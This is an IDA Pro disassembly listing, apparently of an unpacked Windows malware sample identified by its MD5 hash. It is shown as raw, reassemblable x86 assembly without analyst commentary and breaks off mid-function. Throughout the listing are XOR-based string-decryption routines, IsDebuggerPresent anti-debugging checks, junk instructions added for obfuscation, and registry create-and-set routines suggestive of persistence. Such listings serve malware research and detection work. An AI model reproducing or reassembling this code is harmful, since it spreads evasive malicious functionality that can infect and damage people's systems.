;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8D871FEB5DF049AB799CB50C7C8998C7
; File Name : u:\work\8d871feb5df049ab799cb50c7c8998c7_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43DFD9+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40C314 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43E033+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407F91+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43B08C, eax
mov dword_43B090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43B090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43B030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43B034, eax
mov eax, [edx+4]
mov dword_43B038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43B03C
mov esi, dword_43B034
rep movsd
lea edi, dword_43B03C
mov dword_43B034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43B010, 0Bh
push 0Bh
call sub_40C6A4
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43B010, 8
push 8
call sub_40C6A4
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43B010
call sub_40C6A4
add esp, 8
push dword_43B010
call sub_40C68C
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43B02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43B02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_4494FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43B01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43B028
push offset dword_43B024
push offset dword_43B020
call sub_40C62C
push dword_43B028
push dword_43B024
push dword_43B020
mov dword_43B014, esp
call sub_40C0B4
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40C65C
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408C98+25�p
; sub_408C98+41�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43B09C
lea eax, ds:41A6C0h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_4012DD
; ---------------------------------------------------------------------------
loc_4012C3: ; CODE XREF: sub_40129C+43�j
mov eax, dword_43B09C
add eax, edi
lea eax, ds:41A6C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F0h
mov [eax], dl
inc edi
loc_4012DD: ; CODE XREF: sub_40129C+25�j
cmp edi, esi
jl short loc_4012C3
mov [ebp+var_4], 1DDh
mov eax, dword_43B09C
add eax, esi
mov byte ptr ds:dword_41A6C0[eax], 0
mov edi, dword_43B09C
add dword_43B09C, 3
mov eax, dword_43B09C
add eax, 2
add eax, esi
mov dword_43B09C, eax
add dword_43B09C, 2
cmp dword_43B09C, 0DE5h
jle short loc_40132D
and dword_43B09C, 0
loc_40132D: ; CODE XREF: sub_40129C+88�j
mov [ebp+var_8], 3D0h
lea eax, dword_41A6C0[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40133E proc near ; CODE XREF: sub_4081B0+11E�p
var_14C18 = dword ptr -14C18h
var_14C14 = dword ptr -14C14h
var_14C0D = byte ptr -14C0Dh
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 14C18h
call sub_40C118
push ebx
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
mov eax, dword_43B222
mov [ebp+var_14C18], eax
mov [ebp+var_4], 2B7Ah
inc [ebp+var_4]
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F1F0
call sub_40C2FC ; CreateFileA
mov ebx, eax
call sub_40C1F4 ; GetProcessHeap
cmp ebx, 0FFFFFFFFh
jnz short loc_401391
xor eax, eax
jmp short loc_401406
; ---------------------------------------------------------------------------
loc_401391: ; CODE XREF: sub_40133E+4D�j
mov [ebp+var_5], 0B0h
add [ebp+var_5], 1
push 0
lea eax, [ebp+var_14C14]
push eax
push 14C08h
lea eax, [ebp+var_14C0D]
push eax
push ebx
call sub_40C308 ; ReadFile
call sub_40C188 ; GetCurrentProcessId
push ebx
call sub_40C1DC ; CloseHandle
xor edi, edi
loc_4013C1: ; CODE XREF: sub_40133E+B9�j
mov eax, 13h
sub eax, dword_43B098
push eax
push offset byte_432F80
lea eax, [ebp+edi+var_14C0D]
push eax
call sub_40181E
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_4013EE
xor eax, eax
inc eax
jmp short loc_401406
; ---------------------------------------------------------------------------
loc_4013EE: ; CODE XREF: sub_40133E+A9�j
add edi, 11h
cmp edi, [ebp+var_14C14]
jb short loc_4013C1
mov esi, 4B23h
mov eax, esi
add eax, esi
mov esi, eax
xor eax, eax
loc_401406: ; CODE XREF: sub_40133E+51�j
; sub_40133E+AE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40133E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B234
lea eax, ds:419580h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_401449
; ---------------------------------------------------------------------------
loc_401432: ; CODE XREF: .text:0040144B�j
mov eax, dword_43B234
add eax, edi
lea eax, ds:419580h[eax]
movsx edx, byte ptr [eax]
xor edx, 2Bh
mov [eax], dl
inc edi
loc_401449: ; CODE XREF: .text:00401430�j
cmp edi, esi
jl short loc_401432
mov dword ptr [ebp-4], 15Ch
mov eax, dword_43B234
add eax, esi
mov byte ptr ds:dword_419580[eax], 0
xor edi, edi
mov edi, dword_43B234
inc dword_43B234
mov eax, dword_43B234
lea eax, [eax+esi+6]
mov dword_43B234, eax
add dword_43B234, 2
cmp dword_43B234, 0DCBh
jle short loc_401499
and dword_43B234, 0
loc_401499: ; CODE XREF: .text:00401490�j
mov dword ptr [ebp-8], 30h
lea eax, dword_419580[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014AA proc near ; CODE XREF: sub_4063A9+B5�p
; sub_4096E4+1D5�p ...
var_9 = byte ptr -9
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C5B4 ; RegOpenKeyExA
mov ebx, eax
call sub_40C188 ; GetCurrentProcessId
or ebx, ebx
jz short loc_4014DD
xor eax, eax
jmp short loc_40152E
; ---------------------------------------------------------------------------
loc_4014DD: ; CODE XREF: sub_4014AA+2D�j
call sub_40C1F4 ; GetProcessHeap
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C5C0 ; RegQueryValueExA
mov ebx, eax
mov [ebp+var_6], 492Fh
sub [ebp+var_6], 1614h
push [ebp+var_4]
call sub_40C5A8 ; RegCloseKey
call sub_40C188 ; GetCurrentProcessId
or ebx, ebx
jz short loc_40151B
xor eax, eax
jmp short loc_40152E
; ---------------------------------------------------------------------------
loc_40151B: ; CODE XREF: sub_4014AA+6B�j
lea edi, [ebp+var_9]
lea esi, dword_43B238
mov ecx, 3
rep movsb
xor eax, eax
inc eax
loc_40152E: ; CODE XREF: sub_4014AA+31�j
; sub_4014AA+6F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014AA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B244
lea eax, ds:434150h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-4], 11Eh
xor edi, edi
jmp short loc_401577
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_401565
loc_401560: ; CODE XREF: sub_401565+14�j
mov eax, dword_43B244
; END OF FUNCTION CHUNK FOR sub_401565
; =============== S U B R O U T I N E =======================================
sub_401565 proc near ; DATA XREF: .data:0043F0ED�o
; FUNCTION CHUNK AT 00401560 SIZE 00000005 BYTES
add eax, edi
lea eax, ds:434150h[eax]
movsx edx, byte ptr [eax]
xor edx, 66h
mov [eax], dl
inc edi
loc_401577: ; CODE XREF: .text:0040155E�j
cmp edi, esi
jl short loc_401560
mov eax, dword_43B244
add eax, esi
mov byte ptr ds:dword_434150[eax], 0
mov edi, dword_43B244
mov eax, edi
add eax, 4
add eax, esi
mov dword_43B244, eax
add dword_43B244, 3
cmp dword_43B244, 0DEFh
jle short loc_4015B6
and dword_43B244, 0
loc_4015B6: ; CODE XREF: sub_401565+48�j
lea eax, dword_434150[edi]
pop edi
pop esi
leave
retn
sub_401565 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015C0 proc near ; CODE XREF: sub_406081+B2�p
; sub_406081+E0�p ...
var_25 = byte ptr -25h
var_1F = byte ptr -1Fh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_2], 2123h
inc [ebp+var_2]
lea edi, [ebp+var_18]
lea esi, aVyfuC ; "+vyfu C"
movsd
movsd
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C59C ; RegCreateKeyExA
mov ebx, eax
mov [ebp+var_C], 2D0Fh
add [ebp+var_C], 6A82h
or ebx, ebx
jz short loc_401616
xor eax, eax
jmp short loc_40167F
; ---------------------------------------------------------------------------
loc_401616: ; CODE XREF: sub_4015C0+50�j
lea edi, [ebp+var_1F]
lea esi, aPzlvp4 ; "PzL‚P4"
mov ecx, 7
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40C5CC ; RegSetValueExA
mov ebx, eax
call sub_40C224 ; GetVersion
push [ebp+var_8]
call sub_40C5A8 ; RegCloseKey
or ebx, ebx
jz short loc_401653
xor eax, eax
jmp short loc_40167F
; ---------------------------------------------------------------------------
loc_401653: ; CODE XREF: sub_4015C0+8D�j
lea edi, [ebp+var_25]
lea esi, a7cx ; "#7CX|"
mov ecx, 3
rep movsw
cmp [ebp+var_10], 1
jnz short loc_401671
mov eax, 2
jmp short loc_40167F
; ---------------------------------------------------------------------------
loc_401671: ; CODE XREF: sub_4015C0+A8�j
mov ebx, 7FF8h
mov eax, ebx
add eax, ebx
mov ebx, eax
xor eax, eax
inc eax
loc_40167F: ; CODE XREF: sub_4015C0+54�j
; sub_4015C0+91�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4015C0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3E1h
push esi
push dword ptr [ebp+8]
mov eax, dword_43B268
lea eax, ds:437330h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 3C1h
xor edi, edi
jmp short loc_4016D4
; ---------------------------------------------------------------------------
loc_4016BA: ; CODE XREF: .text:004016D6�j
mov eax, dword_43B268
add eax, edi
lea eax, ds:437330h[eax]
movsx edx, byte ptr [eax]
xor edx, 89h
mov [eax], dl
inc edi
loc_4016D4: ; CODE XREF: .text:004016B8�j
cmp edi, esi
jl short loc_4016BA
mov eax, dword_43B268
add eax, esi
mov byte ptr ds:dword_437330[eax], 0
xor edi, edi
mov edi, dword_43B268
mov eax, edi
lea eax, [eax+esi+5]
mov dword_43B268, eax
cmp eax, 0DE8h
jle short loc_401708
and dword_43B268, 0
loc_401708: ; CODE XREF: .text:004016FF�j
mov dword ptr [ebp-0Ch], 270h
lea eax, dword_437330[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401719 proc near ; CODE XREF: sub_4056EE+141�p
; sub_4096E4+8B�p ...
var_6 = byte ptr -6
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
mov [ebp+var_1], 91h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
xor ebx, ebx
jmp short loc_401763
; ---------------------------------------------------------------------------
loc_40173B: ; CODE XREF: sub_401719+4D�j
call sub_40C698
mov edi, [ebp+arg_0]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [edi+ebx], dl
inc ebx
loc_401763: ; CODE XREF: sub_401719+20�j
cmp ebx, [ebp+arg_4]
jl short loc_40173B
lea edi, [ebp+var_6]
lea esi, aXd9 ; " xd9"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov byte ptr [edx+eax], 0
mov eax, edx
pop edi
pop esi
pop ebx
leave
retn
sub_401719 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 18h
push esi
push dword ptr [ebp+8]
mov eax, dword_43B27C
lea eax, ds:42EBF0h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_4017D1
; ---------------------------------------------------------------------------
loc_4017B7: ; CODE XREF: .text:004017D3�j
mov eax, dword_43B27C
add eax, edi
lea eax, ds:42EBF0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C6h
mov [eax], dl
inc edi
loc_4017D1: ; CODE XREF: .text:004017B5�j
cmp edi, esi
jl short loc_4017B7
mov dword ptr [ebp-8], 26Fh
mov eax, dword_43B27C
add eax, esi
mov byte ptr ds:dword_42EBF0[eax], 0
mov edi, dword_43B27C
inc dword_43B27C
mov eax, dword_43B27C
add eax, 5
add eax, esi
mov dword_43B27C, eax
cmp eax, 0E0Dh
jle short loc_401814
and dword_43B27C, 0
loc_401814: ; CODE XREF: .text:0040180B�j
lea eax, dword_42EBF0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40181E proc near ; CODE XREF: sub_40133E+9C�p
; sub_405409+68�p ...
var_24 = dword ptr -24h
var_1F = byte ptr -1Fh
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov ebx, 70E3h
mov eax, ebx
add eax, ebx
mov ebx, eax
and [ebp+var_C], 0
lea edi, [ebp+var_11]
lea esi, a8l7 ; "8l 7"
mov ecx, 5
rep movsb
and [ebp+var_8], 0
jmp loc_401903
; ---------------------------------------------------------------------------
loc_40184F: ; CODE XREF: sub_40181E+F7�j
call sub_40C218 ; GetTickCount
and [ebp+var_4], 0
call sub_40C1F4 ; GetProcessHeap
xor ebx, ebx
jmp loc_4018E9
; ---------------------------------------------------------------------------
loc_401864: ; CODE XREF: sub_40181E+DC�j
lea edi, [ebp+var_15]
lea esi, aYb ; "Y"
mov ecx, 3
rep movsb
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_40188E
inc [ebp+var_4]
loc_40188E: ; CODE XREF: sub_40181E+6B�j
mov [ebp+var_12], 0AFh
movzx eax, [ebp+var_12]
imul eax, 28D8h
mov [ebp+var_12], al
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018A7: ; CODE XREF: sub_40181E+8E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018A7
cmp [ebp+var_4], eax
jnz short loc_4018E8
lea edi, [ebp+var_1F]
lea esi, aM7 ; "m7"
mov ecx, 3
rep movsb
inc [ebp+var_C]
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_4018D3
mov eax, [ebp+var_8]
jmp short loc_401920
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_40181E+AE�j
mov [ebp+var_1C], 7382h
mov eax, 56E9h
mul [ebp+var_1C]
mov [ebp+var_24], eax
mov [ebp+var_1C], eax
loc_4018E8: ; CODE XREF: sub_40181E+93�j
inc ebx
loc_4018E9: ; CODE XREF: sub_40181E+41�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018F1: ; CODE XREF: sub_40181E+D8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018F1
cmp ebx, eax
jb loc_401864
inc [ebp+var_8]
loc_401903: ; CODE XREF: sub_40181E+2C�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40190B: ; CODE XREF: sub_40181E+F2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40190B
cmp [ebp+var_8], eax
jb loc_40184F
mov eax, 0FFFFh
loc_401920: ; CODE XREF: sub_40181E+B3�j
pop edi
pop esi
pop ebx
leave
retn
sub_40181E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3E1h
push esi
push dword ptr [ebp+8]
mov eax, dword_43B294
lea eax, ds:4152B0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 3C1h
xor edi, edi
jmp short loc_401975
; ---------------------------------------------------------------------------
loc_40195B: ; CODE XREF: .text:00401977�j
mov eax, dword_43B294
add eax, edi
lea eax, ds:4152B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 89h
mov [eax], dl
inc edi
loc_401975: ; CODE XREF: .text:00401959�j
cmp edi, esi
jl short loc_40195B
mov eax, dword_43B294
add eax, esi
mov byte ptr ds:dword_4152B0[eax], 0
xor edi, edi
mov edi, dword_43B294
mov eax, edi
lea eax, [eax+esi+5]
mov dword_43B294, eax
cmp eax, 0DE8h
jle short loc_4019A9
and dword_43B294, 0
loc_4019A9: ; CODE XREF: .text:004019A0�j
mov dword ptr [ebp-0Ch], 270h
lea eax, dword_4152B0[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
mov byte ptr [ebp-1], 91h
movzx eax, byte ptr [ebp-1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-1], al
mov ebx, [ebp+10h]
jmp short loc_4019FA
; ---------------------------------------------------------------------------
loc_4019DD: ; CODE XREF: .text:004019FD�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+ebx]
mov edx, ebx
sub edx, [ebp+10h]
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_4019F9
xor eax, eax
inc eax
jmp short loc_401A11
; ---------------------------------------------------------------------------
loc_4019F9: ; CODE XREF: .text:004019F2�j
inc ebx
loc_4019FA: ; CODE XREF: .text:004019DB�j
cmp ebx, [ebp+14h]
jl short loc_4019DD
lea edi, [ebp-6]
lea esi, aXd9_0 ; " xd9"
mov ecx, 5
rep movsb
xor eax, eax
loc_401A11: ; CODE XREF: .text:004019F7�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2A8
lea eax, ds:433080h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov dword ptr [ebp-8], 8Ah
xor edi, edi
jmp short loc_401A66
; ---------------------------------------------------------------------------
loc_401A4C: ; CODE XREF: .text:00401A68�j
mov eax, dword_43B2A8
add eax, edi
lea eax, ds:433080h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CCh
mov [eax], dl
inc edi
loc_401A66: ; CODE XREF: .text:00401A4A�j
cmp edi, esi
jl short loc_401A4C
mov eax, dword_43B2A8
add eax, esi
mov byte ptr ds:dword_433080[eax], 0
xor edi, edi
mov edi, dword_43B2A8
add dword_43B2A8, 2
mov eax, dword_43B2A8
lea eax, [eax+esi+4]
mov dword_43B2A8, eax
add dword_43B2A8, 3
cmp dword_43B2A8, 0DCEh
jle short loc_401AB0
and dword_43B2A8, 0
loc_401AB0: ; CODE XREF: .text:00401AA7�j
mov dword ptr [ebp-0Ch], 20Ah
lea eax, dword_433080[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AC1 proc near ; CODE XREF: sub_4056EE+47�p
; sub_4063A9+40B�p ...
var_1E = byte ptr -1Eh
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_6], 76DDh
movzx eax, [ebp+var_6]
imul eax, 58BEh
mov [ebp+var_6], ax
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40C2FC ; CreateFileA
mov ebx, eax
mov [ebp+var_1], 0F1h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
cmp ebx, 0FFFFFFFFh
jnz short loc_401B40
lea edi, [ebp+var_19]
lea esi, aA_ ; "<A*_"
mov ecx, 5
rep movsb
cmp [ebp+arg_4], 0
jz short loc_401B2C
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401B2C: ; CODE XREF: sub_401AC1+63�j
lea edi, [ebp+var_1E]
lea esi, aB61 ; "B 61"
mov ecx, 5
rep movsb
xor eax, eax
jmp short loc_401BAD
; ---------------------------------------------------------------------------
loc_401B40: ; CODE XREF: sub_401AC1+4D�j
push 0
push ebx
call sub_40C1A0 ; GetFileSize
mov [ebp+var_C], eax
mov [ebp+var_4], 3E6Dh
movzx eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_4], ax
mov eax, [ebp+var_C]
add eax, 10h
push eax
push 40h
call sub_40C2CC ; LocalAlloc
